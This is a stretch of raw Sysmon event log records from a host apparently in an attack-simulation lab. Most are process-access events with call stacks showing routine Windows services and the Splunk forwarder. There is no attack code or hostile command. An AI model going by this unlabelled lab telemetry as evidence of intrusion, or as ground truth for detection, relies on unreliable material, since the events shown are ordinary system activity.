13:35:29.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:29.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:29.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:29.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:29.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:29.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:29.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:29.406{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EA1-6005-9100-00000000A301}4988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:29.406{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EA1-6005-9100-00000000A301}4988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:29.408{59A5CD1D-8EA1-6005-9100-00000000A301}4988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000003139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:35:50.637{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ed9e-0xd615b810) 10341000x80000000000000003138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:50.324{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E47-6005-1E00-00000000A301}2292C:\Windows\system32\compattelrunner.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:50.324{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E47-6005-1E00-00000000A301}2292C:\Windows\system32\compattelrunner.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:16.914{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8ED0-6005-9400-00000000A301}4344C:\Windows\system32\sppsvc.exe0x103800C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.914{59A5CD1D-8E44-6005-0A00-00000000A301}8481100C:\Windows\system32\services.exe{59A5CD1D-8ED0-6005-9400-00000000A301}4344C:\Windows\system32\sppsvc.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+1643d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:16.835{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.835{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:16.835{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.710{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8ED0-6005-9300-00000000A301}2476C:\Windows\System32\msdtc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:16.710{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8ED0-6005-9300-00000000A301}2476C:\Windows\System32\msdtc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.695{59A5CD1D-8E44-6005-0A00-00000000A301}8482664C:\Windows\system32\services.exe{59A5CD1D-8ED0-6005-9300-00000000A301}2476C:\Windows\System32\msdtc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:16.554{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.554{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:16.554{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.554{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:16.554{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 